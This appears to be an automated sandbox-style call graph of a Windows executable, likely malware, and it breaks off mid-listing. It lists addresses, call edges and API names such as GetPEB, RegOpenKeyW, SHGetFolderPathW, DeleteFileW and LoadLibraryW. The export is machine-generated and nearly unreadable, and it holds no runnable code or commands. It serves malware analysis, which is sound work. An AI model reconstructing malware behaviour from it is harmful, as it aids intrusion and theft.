40719a 5 API calls 8825->8827 8826->8821 8828 41276e 8827->8828 8829 412804 8828->8829 8955 406f4a 8828->8955 8983 4070ff 8829->8983 8832 41279a 8961 412553 8832->8961 9005 405907 8842->9005 8844 405a61 8845 405907 3 API calls 8844->8845 8846 405a76 8844->8846 8845->8844 8846->8668 8848 402b7c 2 API calls 8847->8848 8850 405a99 8848->8850 8851 405ade 8850->8851 9008 40595e 8850->9008 8851->8686 8880 4076a8 8852->8880 8854 406913 8855 406a61 8854->8855 8856 40771e 5 API calls 8854->8856 8855->8795 8857 406949 8856->8857 8857->8855 8859 404678 3 API calls 8857->8859 8860 40771e GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree GetPEB 8857->8860 8886 4046c2 8857->8886 8859->8857 8860->8857 8862 4031e5 3 API calls 8861->8862 8863 4068a6 8862->8863 8863->8795 8865 4046b4 8864->8865 8866 4046a4 8864->8866 8865->8793 8868 404678 8865->8868 8867 4031e5 3 API calls 8866->8867 8867->8865 8869 4031e5 3 API calls 8868->8869 8870 40468b 8869->8870 8870->8793 8871 40771e 8870->8871 8872 407737 8871->8872 8875 407748 8871->8875 8873 407644 5 API calls 8872->8873 8874 407741 8873->8874 8876 406baa 5 API calls 8874->8876 8875->8804 8876->8875 8878 4031e5 3 API calls 8877->8878 8879 4068c2 8878->8879 8879->8811 8881 4076c1 8880->8881 8882 4076d2 8880->8882 8894 407644 8881->8894 8882->8854 8887 4046d3 8886->8887 8889 4046d9 8886->8889 8929 40464c 8887->8929 8890 4046e9 8889->8890 8892 404678 3 API calls 8889->8892 8891 404714 8890->8891 8893 40469b 3 API calls 8890->8893 8891->8857 8892->8890 8893->8891 8895 407653 8894->8895 8896 407661 8894->8896 8895->8896 8902 406a6b 8895->8902 8898 406baa 8896->8898 8899 406bbb 8898->8899 8900 406bc8 8898->8900 8899->8900 8910 407402 8899->8910 8900->8882 8904 406a81 8902->8904 8903 402b7c 2 API calls 8903->8904 8904->8903 8905 406894 3 API calls 8904->8905 8906 406b96 8904->8906 8908 402bab 2 API calls 8904->8908 8909 406b8b 8904->8909 8905->8904 8907 402bab 2 API calls 8906->8907 8907->8909 8908->8904 8909->8896 8911 407644 5 API calls 8910->8911 8912 407412 8911->8912 8913 402b7c 2 API calls 8912->8913 8920 407450 8912->8920 8914 407483 8913->8914 8915 402b7c 2 API calls 8914->8915 8914->8920 8917 4074ce 8915->8917 8916 4074da 8918 4068cc 2 API calls 8916->8918 8917->8916 8919 402b7c 2 API calls 8917->8919 8918->8920 8923 40751f 8919->8923 8920->8900 8921 40752b 8922 4068cc 2 API calls 8921->8922 8922->8916 8923->8921 8925 4068cc 8923->8925 8926 4068d6 8925->8926 8927 4068e3 8925->8927 8926->8927 8928 402bab GetProcessHeap HeapFree 8926->8928 8927->8921 8928->8927 8930 404659 8929->8930 8932 404666 8929->8932 8931 4031e5 3 API calls 8930->8931 8931->8932 8932->8889 8934 4047e6 4 API calls 8933->8934 8935 404897 8934->8935 8936 40489c 8935->8936 8991 4047c7 8935->8991 8936->8814 8940 40706f 8939->8940 8941 407084 8939->8941 8940->8941 8942 407644 5 API calls 8940->8942 8946 4070e4 8941->8946 8994 406fd2 8941->8994 8943 40707d 8942->8943 8945 406baa 5 API calls 8943->8945 8945->8941 8946->8823 8947 40719a 8946->8947 8948 4071b0 8947->8948 8950 4071c5 8947->8950 8949 407644 5 API calls 8948->8949 8948->8950 8951 4071be 8949->8951 8953 406fd2 3 API calls 8950->8953 8954 407226 8950->8954 8952 406baa 5 API calls 8951->8952 8952->8950 8953->8954 8954->8824 8954->8826 8956 406f64 8955->8956 8959 406f75 8955->8959 8957 407644 5 API calls 8956->8957 8958 406f6e 8957->8958 8960 406baa 5 API calls 8958->8960 8959->8832 8960->8959 9002 4060ac 8961->9002 8984 407116 8983->8984 8987 40712b 8983->8987 8985 407644 5 API calls 8984->8985 8984->8987 8986 407124 8985->8986 8988 406baa 5 API calls 8986->8988 8989 406fd2 3 API calls 8987->8989 8990 407187 8987->8990 8988->8987 8989->8990 8990->8826 8992 4031e5 3 API calls 8991->8992 8993 4047d9 8992->8993 8993->8814 8995 406fde 8994->8995 8996 407027 8995->8996 8997 4031e5 3 API calls 8995->8997 8996->8946 8998 406ffa 8997->8998 8999 4031e5 3 API calls 8998->8999 9000 407011 8999->9000 9001 4031e5 3 API calls 9000->9001 9001->8996 9003 4031e5 3 API calls 9002->9003 9004 4060bb 9003->9004 9004->9004 9006 4031e5 3 API calls 9005->9006 9007 40591a 9006->9007 9007->8844 9009 4031e5 3 API calls 9008->9009 9010 405971 9009->9010 9010->8850 9012 4031e5 3 API calls 9011->9012 9013 4059ed 9012->9013 9014 402b7c 2 API calls 9013->9014 9017 405a38 9013->9017 9015 405a16 9014->9015 9016 4031e5 3 API calls 9015->9016 9015->9017 9016->9017 9017->8761 9851 40a349 9852 4098a7 13 API calls 9851->9852 9853 40a359 9852->9853 9096 408952 9117 40823f 9096->9117 9099 408960 9101 4056bf 2 API calls 9099->9101 9102 40896a 9101->9102 9145 408862 9102->9145 9104 4089c4 9105 413aca 4 API calls 9104->9105 9106 4089d4 9105->9106 9108 405695 2 API calls 9106->9108 9107 408975 9107->9104 9153 4087d6 9107->9153 9110 4089df 9108->9110 9115 402bab 2 API calls 9116 40899d 9115->9116 9116->9104 9116->9115 9118 40824d 9117->9118 9119 4031e5 3 API calls 9118->9119 9132 40831b 9118->9132 9120 40826d 9119->9120 9121 4031e5 3 API calls 9120->9121 9122 408289 9121->9122 9123 4031e5 3 API calls 9122->9123 9124 4082a5 9123->9124 9125 4031e5 3 API calls 9124->9125 9126 4082c1 9125->9126 9127 4031e5 3 API calls 9126->9127 9128 4082e2 9127->9128 9129 4031e5 3 API calls 9128->9129 9130 4082ff 9129->9130 9131 4031e5 3 API calls 9130->9131 9131->9132 9132->9099 9133 4083bb 9132->9133 9181 408363 9133->9181 9136 4084ab 9136->9099 9137 4056bf 2 API calls 9138 4083f4 9137->9138 9142 408492 9138->9142 9184 40815d 9138->9184 9199 40805d 9138->9199 9139 413aca 4 API calls 9140 4084a0 9139->9140 9141 405695 2 API calls 9140->9141 9141->9136 9142->9139 9214 404b8f 9145->9214 9147 408946 9147->9107 9148 4031e5 3 API calls 9149 40887e 9148->9149 9149->9147 9149->9148 9150 40893e 9149->9150 9152 402b7c 2 API calls 9149->9152 9217 404a39 9150->9217 9152->9149 9154 402b7c 2 API calls 9153->9154 9155 4087e7 9154->9155 9156 40885a 9155->9156 9157 4031e5 3 API calls 9155->9157 9165 408749 9156->9165 9160 408802 9157->9160 9158 402bab 2 API calls 9158->9156 9161 40884d 9160->9161 9163 408853 9160->9163 9226 408522 9160->9226 9230 4084b4 9160->9230 9233 4084d4 9161->9233 9163->9158 9166 404b8f 4 API calls 9165->9166 9170 408765 9166->9170 9167 4031e5 3 API calls 9167->9170 9168 408522 3 API calls 9168->9170 9169 4087c7 9171 404a39 4 API calls 9169->9171 9170->9167 9170->9168 9170->9169 9172 4087cf 9170->9172 9171->9172 9173 4085d1 9172->9173 9174 4086c2 9173->9174 9179 4085e9 9173->9179 9174->9116 9176 402bab 2 API calls 9176->9179 9177 4031e5 3 API calls 9177->9179 9179->9174 9179->9176 9179->9177 9239 4089e6 9179->9239 9258 4086c9 9179->9258 9262 4036a3 9179->9262 9182 4031e5 3 API calls 9181->9182 9183 408386 9182->9183 9183->9136 9183->9137 9185 40816f 9184->9185 9186 4081b6 9185->9186 9187 4081fd 9185->9187 9198 4081ef 9185->9198 9188 405872 4 API calls 9186->9188 9189 405872 4 API calls 9187->9189 9190 4081cf 9188->9190 9191 408213 9189->9191 9192 405872 4 API calls 9190->9192 9193 405872 4 API calls 9191->9193 9194 4081df 9192->9194 9195 408222 9193->9195 9196 405872 4 API calls 9194->9196 9197 405872 4 API calls 9195->9197 9196->9198 9197->9198 9198->9138 9200 40808c 9199->9200 9201 4080d2 9200->9201 9202 408119 9200->9202 9213 40810b 9200->9213 9204 405872 4 API calls 9201->9204 9203 405872 4 API calls 9202->9203 9205 40812f 9203->9205 9206 4080eb 9204->9206 9208 405872 4 API calls 9205->9208 9207 405872 4 API calls 9206->9207 9209 4080fb 9207->9209 9210 40813e 9208->9210 9211 405872 4 API calls 9209->9211 9212 405872 4 API calls 9210->9212 9211->9213 9212->9213 9213->9138 9220 404a19 9214->9220 9216 404ba0 9216->9149 9223 4049ff 9217->9223 9219 404a44 9219->9147 9221 4031e5 3 API calls 9220->9221 9222 404a2c RegOpenKeyW 9221->9222 9222->9216 9224 4031e5 3 API calls 9223->9224 9225 404a12 RegCloseKey 9224->9225 9225->9219 9227 408534 9226->9227 9229 4085af 9227->9229 9236 4084ee 9227->9236 9229->9160 9231 4031e5 3 API calls 9230->9231 9232 4084c7 9231->9232 9232->9160 9234 4031e5 3 API calls 9233->9234 9235 4084e7 9234->9235 9235->9163 9237 4031e5 3 API calls 9236->9237 9238 408501 9237->9238 9238->9229 9240 4031e5 3 API calls 9239->9240 9241 408a06 9240->9241 9242 408b21 9241->9242 9243 4031e5 3 API calls 9241->9243 9242->9179 9246 408a32 9243->9246 9244 408b17 9274 403649 9244->9274 9246->9244 9265 403666 9246->9265 9249 408b0e 9271 40362f 9249->9271 9250 4031e5 3 API calls 9252 408a88 9250->9252 9252->9249 9253 4031e5 3 API calls 9252->9253 9254 408ac4 9253->9254 9255 405b6f 5 API calls 9254->9255 9256 408aff 9255->9256 9256->9249 9268 408508 9256->9268 9259 408744 9258->9259 9261 4086e2 9258->9261 9259->9179 9260 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9260->9261 9261->9259 9261->9260 9263 4031e5 3 API calls 9262->9263 9264 4036b5 9263->9264 9264->9179 9266 4031e5 3 API calls 9265->9266 9267 403679 9266->9267 9267->9249 9267->9250 9269 4031e5 3 API calls 9268->9269 9270 40851b 9269->9270 9270->9249 9272 4031e5 3 API calls 9271->9272 9273 403642 9272->9273 9273->9244 9275 4031e5 3 API calls 9274->9275 9276 40365c 9275->9276 9276->9242 9871 40f252 9872 404bee 5 API calls 9871->9872 9873 40f269 9872->9873 9874 404bee 5 API calls 9873->9874 9882 40f2ff 9873->9882 9875 40f282 9874->9875 9876 404bee 5 API calls 9875->9876 9877 40f290 9876->9877 9888 404c4e 9877->9888 9879 40f2a7 9880 405872 4 API calls 9879->9880 9879->9882 9881 40f2cd 9880->9881 9883 405872 4 API calls 9881->9883 9884 40f2dc 9883->9884 9885 405872 4 API calls 9884->9885 9886 40f2ee 9885->9886 9887 405762 4 API calls 9886->9887 9887->9882 9889 402b7c 2 API calls 9888->9889 9890 404c60 9889->9890 9891 404ca4 9890->9891 9892 4031e5 3 API calls 9890->9892 9891->9879 9893 404c8d 9892->9893 9893->9891 9894 402bab 2 API calls 9893->9894 9894->9891 9895 41045c 9896 4040bb 12 API calls 9895->9896 9897 410477 9896->9897 9903 41060b 9897->9903 9926 407851 9897->9926 9899 41048f 9900 410604 9899->9900 9902 407851 2 API calls 9899->9902 9901 403f9e 4 API calls 9900->9901 9901->9903 9909 4104a9 9902->9909 9904 4105eb 9905 4105fb 9904->9905 9907 402bab 2 API calls 9904->9907 9906 402bab 2 API calls 9905->9906 9906->9900 9907->9905 9908 4105e0 9908->9904 9911 402bab 2 API calls 9908->9911 9909->9904 9909->9908 9910 405ae9 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree GetPEB 9909->9910 9912 41056f 9909->9912 9910->9909 9911->9904 9912->9908 9913 4105d6 9912->9913 9915 412269 5 API calls 9912->9915 9914 402bab 2 API calls 9913->9914 9914->9908 9916 410580 9915->9916 9916->9913 9917 405872 4 API calls 9916->9917 9918 410599 9917->9918 9919 405872 4 API calls 9918->9919 9920 4105a9 9919->9920 9921 405872 4 API calls 9920->9921 9922 4105bb 9921->9922 9923 405872 4 API calls 9922->9923 9924 4105cd 9923->9924 9925 402bab 2 API calls 9924->9925 9925->9913 9927 407866 9926->9927 9928 402b7c 2 API calls 9927->9928 9929 407899 9927->9929 9928->9929 9929->9899 9338 40f561 9341 40f4b6 9338->9341 9342 413b28 6 API calls 9341->9342 9344 40f4bf 9342->9344 9343 405b6f GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree GetPEB 9343->9344 9344->9343 9345 413a58 13 API calls 9344->9345 9346 402bab GetProcessHeap HeapFree 9344->9346 9347 40f559 9344->9347 9345->9344 9346->9344 9351 403b64 9352 4031e5 3 API calls 9351->9352 9353 403b77 PathFileExistsW 9352->9353 9961 40d069 9962 404bee 5 API calls 9961->9962 9963 40d080 9962->9963 9964 404bee 5 API calls 9963->9964 9999 40d1e2 9963->9999 9965 40d099 9964->9965 9966 404bee 5 API calls 9965->9966 9967 40d0a7 9966->9967 10002 404ba7 9967->10002 9970 404bee 5 API calls 9971 40d0c5 9970->9971 9972 404c4e 5 API calls 9971->9972 9973 40d0dc 9972->9973 9974 404bee 5 API calls 9973->9974 9975 40d0eb 9974->9975 9976 404ba7 3 API calls 9975->9976 9977 40d0fa 9976->9977 9978 404bee 5 API calls 9977->9978 9979 40d109 9978->9979 9980 404c4e 5 API calls 9979->9980 9981 40d123 9980->9981 9982 405872 4 API calls 9981->9982 9981->9999 9983 40d14a 9982->9983 9984 405872 4 API calls 9983->9984 9985 40d159 9984->9985 9986 405872 4 API calls 9985->9986 9987 40d16b 9986->9987 9988 405781 4 API calls 9987->9988 9989 40d179 9988->9989 9990 405872 4 API calls 9989->9990 9991 40d18b 9990->9991 9992 405762 4 API calls 9991->9992 9993 40d19f 9992->9993 9994 405872 4 API calls 9993->9994 9995 40d1b1 9994->9995 9996 405781 4 API calls 9995->9996 9997 40d1bf 9996->9997 9998 405872 4 API calls 9997->9998 10000 40d1d1 9998->10000 10001 405762 4 API calls 10000->10001 10001->9999 10003 4031e5 3 API calls 10002->10003 10004 404bca 10003->10004 10004->9970 9377 40f16e 9378 4056bf 2 API calls 9377->9378 9379 40f17b 9378->9379 9380 412093 12 API calls 9379->9380 9381 40f19e 9380->9381 9382 412093 12 API calls 9381->9382 9383 40f1b6 9382->9383 9384 412093 12 API calls 9383->9384 9385 40f1cc 9384->9385 9386 412093 12 API calls 9385->9386 9387 40f1e2 9386->9387 9388 413aca 4 API calls 9387->9388 9389 40f1ef 9388->9389 9390 405695 2 API calls 9389->9390 9391 40f1fa 9390->9391 9392 40ce71 9393 413b28 6 API calls 9392->9393 9394 40ce78 9393->9394 9395 405b6f 5 API calls 9394->9395 9399 40ce83 9395->9399 9396 40cec1 9397 403fbf 6 API calls 9396->9397 9398 40cecc 9397->9398 9400 40cefb 9398->9400 9401 403d74 10 API calls 9398->9401 9399->9396 9402 403d74 10 API calls 9399->9402 9410 40ceba 9399->9410 9404 40cee7 9401->9404 9405 40cead 9402->9405 9403 402bab 2 API calls 9403->9396 9406 40cef4 9404->9406 9407 402bab 2 API calls 9404->9407 9409 402bab 2 API calls 9405->9409 9405->9410 9408 402bab 2 API calls 9406->9408 9407->9406 9408->9400 9409->9410 9410->9403 9411 406472 9412 4031e5 3 API calls 9411->9412 9413 406484 Sleep 9412->9413 10081 40f204 10082 405781 4 API calls 10081->10082 10083 40f214 10082->10083 10084 4057df 13 API calls 10083->10084 10085 40f226 10084->10085 9471 403c08 9472 4031e5 3 API calls 9471->9472 9473 403c1a DeleteFileW 9472->9473 9474 410a09 9475 41219c 14 API calls 9474->9475 9476 410a1b 9475->9476 9477 41219c 14 API calls 9476->9477 9478 410a23 9477->9478 9479 41219c 14 API calls 9478->9479 9480 410a2c 9479->9480 9481 41219c 14 API calls 9480->9481 9482 410a38 9481->9482 9483 404b22 6 API calls 9482->9483 9484 410a4c 9483->9484 9485 410a7a 9484->9485 9486 403fbf 6 API calls 9484->9486 9487 410a5c 9486->9487 9488 410a71 9487->9488 9489 413a58 13 API calls 9487->9489 9490 402bab 2 API calls 9488->9490 9491 410a6b 9489->9491 9490->9485 9492 402bab 2 API calls 9491->9492 9492->9488 10086 410d09 10087 410d17 10086->10087 10092 410d56 10086->10092 10102 406642 10087->10102 10089 413a58 13 API calls 10090 410d6f 10089->10090 10092->10089 10093 4056bf 2 API calls 10094 410d2e 10093->10094 10115 405641 10094->10115 10096 410d41 10097 413aca 4 API calls 10096->10097 10098 410d4a 10097->10098 10099 405695 2 API calls 10098->10099 10100 410d50 10099->10100 10101 4036a3 3 API calls 10100->10101 10101->10092 10103 406662 10102->10103 10104 4031e5 3 API calls 10103->10104 10105 406676 10104->10105 10119 4066bf 10105->10119 10110 4066b1 10113 4036a3 3 API calls 10110->10113 10111 4066a7 10112 4036a3 3 API calls 10111->10112 10114 4066ac 10112->10114 10113->10114 10114->10092 10114->10093 10116 40564d 10115->10116 10118 405673 10115->10118 10117 4056fc 4 API calls 10116->10117 10116->10118 10117->10118 10118->10096 10120 4031e5 3 API calls 10119->10120 10121 4066dc 10120->10121 10122 4066f6 SetLastError 10121->10122 10123 406708 GetLastError 10121->10123 10124 406693 10122->10124 10123->10124 10125 406713 10123->10125 10141 406455 10124->10141 10126 4031e5 3 API calls 10125->10126 10127 406725 10126->10127 10127->10124 10128 4031e5 3 API calls 10127->10128 10129 40673f 10128->10129 10130 406753 10129->10130 10131 406749 10129->10131 10133 4031e5 3 API calls 10130->10133 10132 4036a3 3 API calls 10131->10132 10132->10124 10134 406761 10133->10134 10135 40678a 10134->10135 10136 40677c 10134->10136 10137 4036a3 3 API calls 10135->10137 10138 4036a3 3 API calls 10136->10138 10137->10124 10139 406781 10138->10139 10140 4036a3 3 API calls 10139->10140 10140->10124 10142 4031e5 3 API calls 10141->10142 10143 406468 10142->10143 10143->10110 10143->10111 9493 40c509 9494 412093 12 API calls 9493->9494 9495 40c51e 9494->9495 9502 40910d 9503 404b22 6 API calls 9502->9503 9504 409124 9503->9504 9505 40917a 9504->9505 9506 405b6f 5 API calls 9504->9506 9507 40913e 9506->9507 9508 409173 9507->9508 9510 404b22 6 API calls 9507->9510 9509 402bab 2 API calls 9508->9509 9509->9505 9511 409153 9510->9511 9512 40916a 9511->9512 9513 409408 17 API calls 9511->9513 9514 402bab 2 API calls 9512->9514 9515 409164 9513->9515 9514->9508 9516 402bab 2 API calls 9515->9516 9516->9512 9520 410410 9521 4056bf 2 API calls 9520->9521 9522 41041b 9521->9522 9523 412093 12 API calls 9522->9523 9524 41043c 9523->9524 9525 413aca 4 API calls 9524->9525 9526 410449 9525->9526 9527 405695 2 API calls 9526->9527 9528 410454 9527->9528 9555 40c71a 9556 41219c 14 API calls 9555->9556 9557 40c728 9556->9557 10199 410b1a 10200 404bee 5 API calls 10199->10200 10202 410b31 10200->10202 10201 410c6d 10202->10201 10203 404bee 5 API calls 10202->10203 10204 410b5a 10203->10204 10205 404bee 5 API calls 10204->10205 10206 410b69 10205->10206 10207 404bee 5 API calls 10206->10207 10208 410b78 10207->10208 10209 404ba7 3 API calls 10208->10209 10210 410b86 10209->10210 10211 404ba7 3 API calls 10210->10211 10212 410b95 10211->10212 10212->10201 10213 405872 4 API calls 10212->10213 10214 410bd7 10213->10214 10215 405872 4 API calls 10214->10215 10216 410be8 10215->10216 10217 405872 4 API calls 10216->10217 10218 410bf9 10217->10218 10219 405781 4 API calls 10218->10219 10220 410c07 10219->10220 10221 405781 4 API calls 10220->10221 10224 410c15 10221->10224 10222 405762 4 API calls 10223 410c60 10222->10223 10223->10201 10225 403f9e 4 API calls 10223->10225 10231 410c4e 10224->10231 10232 405e5a 10224->10232 10225->10201 10228 4040bb 12 API calls 10229 410c44 10228->10229 10230 402bab 2 API calls 10229->10230 10230->10231 10231->10222 10233 402b7c 2 API calls 10232->10233 10234 405e72 10233->10234 10235 4031e5 3 API calls 10234->10235 10236 405ea3 10234->10236 10237 405e94 10235->10237 10236->10228 10236->10231 10237->10236 10238 402bab 2 API calls 10237->10238 10238->10236 10239 40f81c 10240 404bee 5 API calls 10239->10240 10241 40f833 10240->10241 10242 404bee 5 API calls 10241->10242 10255 40f94f 10241->10255 10243 40f85c 10242->10243 10244 404bee 5 API calls 10243->10244 10245 40f86b 10244->10245 10246 404bee 5 API calls 10245->10246 10247 40f87a 10246->10247 10248 404bee 5 API calls 10247->10248 10249 40f888 10248->10249 10250 404ba7 3 API calls 10249->10250 10251 40f897 10250->10251 10252 405872 4 API calls 10251->10252 10251->10255 10253 40f8d8 10252->10253 10254 405872 4 API calls 10253->10254 10256 40f8ea 10254->10256 10257 405872 4 API calls 10256->10257 10258 40f8fa 10257->10258 10259 405872 4 API calls 10258->10259 10260 40f90c 10259->10260 10261 405781 4 API calls 10260->10261 10262 40f91d 10261->10262 10263 4040bb 12 API calls 10262->10263 10264 40f92d 10263->10264 10265 405762 4 API calls 10264->10265 10266 40f93f 10265->10266 10266->10255 10267 403f9e 4 API calls 10266->10267 10267->10255 9570 402c1f 9571 4031e5 3 API calls 9570->9571 9572 402c31 LoadLibraryW 9571->9572 10277 407e1f 10278 407e2c 10277->10278 10283 407e61 10277->10283 10280 402bab 2 API calls 10278->10280 10284 407e3e 10278->10284 10289 407e51 10278->10289 10279 407ea6 10281 402bab 2 API calls 10279->10281 10286 407eb6 10279->10286 10280->10284 10281->10286 10282 402bab 2 API calls 10282->10289 10283->10279 10283->10286 10287 405872 4 API calls 10283->10287 10285 402bab 2 API calls 10284->10285 10291 407ed4 10284->10291 10285->10289 10286->10282 10286->10289 10290 407e86 10287->10290 10288 402bab 2 API calls 10288->10291 10289->10288 10289->10291 10292 405872 4 API calls 10290->10292 10293 407e96 10292->10293 10294 405872 4 API calls 10293->10294 10294->10279 10295 40fa23 10296 40fa39 10295->10296 10297 410293 10296->10297 10298 405b6f 5 API calls 10296->10298 10299 40ffcc 10298->10299 10299->10297 10300 4040bb 12 API calls 10299->10300 10301 40ffeb 10300->10301 10302 41028c 10301->10302 10304 41027d 10301->10304 10305 402b7c 2 API calls 10301->10305 10303 402bab 2 API calls 10302->10303 10303->10297 10306 403f9e 4 API calls 10304->10306 10307 41001e 10305->10307 10306->10302 10307->10304 10308 40a423 3 API calls 10307->10308 10309 41004a 10308->10309 10310 4031e5 3 API calls 10309->10310 10311 41005c 10310->10311 10312 4031e5 3 API calls 10311->10312 10313 410079 10312->10313 10314 4031e5 3 API calls 10313->10314 10315 410096 10314->10315 10316 4031e5 3 API calls 10315->10316 10317 4100b0 10316->10317 10318 4031e5 3 API calls 10317->10318 10319 4100cd 10318->10319 10320 4031e5 3 API calls 10319->10320 10321 4100ea 10320->10321 10351 412516 10321->10351 10323 4100fd 10324 40642c 4 API calls 10323->10324 10325 41013e 10324->10325 10326 410142 10325->10326 10327 41019f 10325->10327 10328 40488c 4 API calls 10326->10328 10330 4031e5 3 API calls 10327->10330 10329 410151 10328->10329 10331 41019c 10329->10331 10332 404866 3 API calls 10329->10332 10343 4101bb 10330->10343 10333 41022a 10331->10333 10335 40642c 4 API calls 10331->10335 10334 410163 10332->10334 10339 413a58 13 API calls 10333->10339 10336 41018e 10334->10336 10338 406c4c 5 API calls 10334->10338 10337 410201 10335->10337 10340 403c40 4 API calls 10336->10340 10341 410205 10337->10341 10342 41022f 10337->10342 10344 410178 10338->10344 10345 41026e 10339->10345 10340->10331 10346 4126a7 6 API calls 10341->10346 10354 4125db 10342->10354 10348 4031e5 3 API calls 10343->10348 10349 406c4c 5 API calls 10344->10349 10350 402bab 2 API calls 10345->10350 10346->10333 10348->10331 10349->10336 10350->10304 10352 4031e5 3 API calls 10351->10352 10353 412539 10352->10353 10353->10323 10355 40488c 4 API calls 10354->10355 10356 4125ec 10355->10356 10357 41269f 10356->10357 10358 4031e5 3 API calls 10356->10358 10357->10333 10359 412609 10358->10359 10360 4031e5 3 API calls 10359->10360 10365 41268f 10359->10365 10362 41262a 10360->10362 10361 403c40 4 API calls 10361->10357 10370 412675 10362->10370 10371 4124f1 10362->10371 10363 4031e5 3 API calls 10363->10365 10365->10361 10367 412663 10369 4031e5 3 API calls 10367->10369 10368 4124f1 3 API calls 10368->10367 10369->10370 10370->10363 10372 4031e5 3 API calls 10371->10372 10373 412503 10372->10373 10373->10367 10373->10368 10385 410927 10386 4044ee 7 API calls 10385->10386 10387 41093d 10386->10387 10388 4056bf 2 API calls 10387->10388 10399 4109a4 10387->10399 10391 410954 10388->10391 10389 4044ee 7 API calls 10389->10391 10391->10389 10392 402bab 2 API calls 10391->10392 10393 410990 10391->10393 10400 41080e 10391->10400 10392->10391 10394 413aca 4 API calls 10393->10394 10395 410998 10394->10395 10396 405695 2 API calls 10395->10396 10397 41099e 10396->10397 10398 402bab 2 API calls 10397->10398 10398->10399 10401 410821 10400->10401 10402 41091f 10401->10402 10412 410701 10401->10412 10402->10391 10405 405872 4 API calls 10406 410900 10405->10406 10407 405872 4 API calls 10406->10407 10408 41090d 10407->10408 10409 405872 4 API calls 10408->10409 10410 410919 10409->10410 10411 402bab 2 API calls 10410->10411 10411->10402 10413 405f08 3 API calls 10412->10413 10415 410713 10413->10415 10414 410804 10414->10402 10414->10405 10415->10414 10416 402b7c 2 API calls 10415->10416 10420 410748 10416->10420 10417 4107fd 10418 402bab 2 API calls 10417->10418 10418->10414 10419 402b7c 2 API calls 10422 4107ad 10419->10422 10420->10417 10420->10419 10421 402bab 2 API calls 10421->10417 10422->10421 10423 40d726 10424 404bee 5 API calls 10423->10424 10425 40d73f 10424->10425 10426 405872 4 API calls 10425->10426 10438 40db63 10425->10438 10429 40d761 10426->10429 10427 404bee 5 API calls 10427->10429 10428 405872 4 API calls 10428->10429 10429->10427 10429->10428 10431 40d971 10429->10431 10430 404ba7 3 API calls 10430->10431 10431->10430 10432 405781 4 API calls 10431->10432 10437 40d9bb 10431->10437 10432->10431 10433 404c4e 5 API calls 10433->10437 10434 405781 4 API calls 10434->10437 10435 4037be 3 API calls 10435->10437 10436 405872 4 API calls 10436->10437 10437->10433 10437->10434 10437->10435 10437->10436 10437->10438 9640 40f12f 9641 41219c 14 API calls 9640->9641 9642 40f13f 9641->9642 9643 41219c 14 API calls 9642->9643 9644 40f14c 9643->9644 9645 41219c 14 API calls 9644->9645 9646 40f159 9645->9646 9647 41219c 14 API calls 9646->9647 9648 40f166 9647->9648 9655 40ed35 9656 4056bf 2 API calls 9655->9656 9657 40ed42 9656->9657 9658 412093 12 API calls 9657->9658 9659 40ed63 9658->9659 9660 412093 12 API calls 9659->9660 9661 40ed73 9660->9661 9662 413aca 4 API calls 9661->9662 9663 40ed80 9662->9663 9664 405695 2 API calls 9663->9664 9665 40ed8e 9664->9665 8194 40f3c5 8199 41219c 8194->8199 8197 41219c 14 API calls 8198 40f3e1 8197->8198 8200 4121b1 8199->8200 8216 40f3d3 8199->8216 8201 4121be 8200->8201 8205 4121c5 8200->8205 8248 413ba4 8201->8248 8204 4121ca 8217 404056 8204->8217 8205->8204 8210 412210 8205->8210 8206 4121c3 8206->8216 8225 405b6f 8206->8225 8209 41224d 8213 402bab 2 API calls 8209->8213 8209->8216 8210->8216 8253 403fbf 8210->8253 8213->8216 8216->8197 8264 402b7c GetProcessHeap RtlAllocateHeap 8217->8264 8219 404066 8224 404095 8219->8224 8266 4031e5 8219->8266 8222 404099 8223 402bab 2 API calls 8222->8223 8223->8224 8224->8206 8226 405b7d 8225->8226 8227 402b7c 2 API calls 8226->8227 8228 405b99 8227->8228 8234 405c02 8228->8234 8302 4059b8 8228->8302 8230 405c09 8233 402bab 2 API calls 8230->8233 8231 405bba 8231->8230 8232 402b7c 2 API calls 8231->8232 8235 405bdd 8232->8235 8233->8234 8234->8209 8238 413a58 8234->8238 8235->8230 8236 405be4 8235->8236 8237 402bab 2 API calls 8236->8237 8237->8234 8239 412245 8238->8239 8240 413a63 8238->8240 8261 402bab 8239->8261 8240->8239 8305 405781 8240->8305 8243 405781 4 API calls 8244 413aa0 8243->8244 8308 4057df 8244->8308 8247 405781 4 API calls 8247->8239 8249 413bad 8248->8249 8250 404056 6 API calls 8249->8250 8252 413bb8 8249->8252 8251 413bc5 8250->8251 8251->8206 8252->8206 8254 402b7c 2 API calls 8253->8254 8255 403fcf 8254->8255 8258 403ff4 8255->8258 8427 403b98 8255->8427 8258->8206 8259 403ff8 GetLastError 8260 402bab 2 API calls 8259->8260 8260->8258 8262 402bb4 GetProcessHeap HeapFree 8261->8262 8263 402bc6 8261->8263 8262->8263 8263->8209 8265 402b98 8264->8265 8265->8219 8267 403236 8266->8267 8269 4031f3 8266->8269 8277 4030a5 8267->8277 8269->8267 8271 403208 8269->8271 8270 403224 8272 403258 SHGetFolderPathW 8270->8272 8274 4031e5 3 API calls 8270->8274 8283 403263 8271->8283 8272->8222 8272->8224 8274->8272 8275 40320d 8275->8272 8276 4030a5 3 API calls 8275->8276 8276->8270 8289 402ca4 8277->8289 8279 4030b5 8279->8270 8280 4030b0 8280->8279 8293 4030c4 8280->8293 8284 40326d 8283->8284 8285 402b7c 2 API calls 8284->8285 8288 4032b7 8284->8288 8286 40328c 8285->8286 8287 402b7c 2 API calls 8286->8287 8287->8288 8288->8275 8290 403079 8289->8290 8292 40307c 8290->8292 8297 40317b GetPEB 8290->8297 8292->8280 8294 4030eb 8293->8294 8296 4030c0 8294->8296 8299 402c03 8294->8299 8296->8270 8298 40319b 8297->8298 8298->8292 8300 4031e5 3 API calls 8299->8300 8301 402c15 8300->8301 8301->8296 8303 4031e5 3 API calls 8302->8303 8304 4059cb 8303->8304 8304->8231 8323 405797 8305->8323 8307 405792 8307->8243 8309 4057eb 8308->8309 8322 405832 8308->8322 8309->8322 8333 4040bb 8309->8333 8312 405839 8314 405853 8312->8314 8360 405627 8312->8360 8313 40582c 8357 403f9e 8313->8357 8371 405762 8314->8371 8320 403f9e 4 API calls 8320->8322 8322->8239 8322->8247 8324 4057a1 8323->8324 8326 4057bd 8323->8326 8324->8326 8327 4056fc 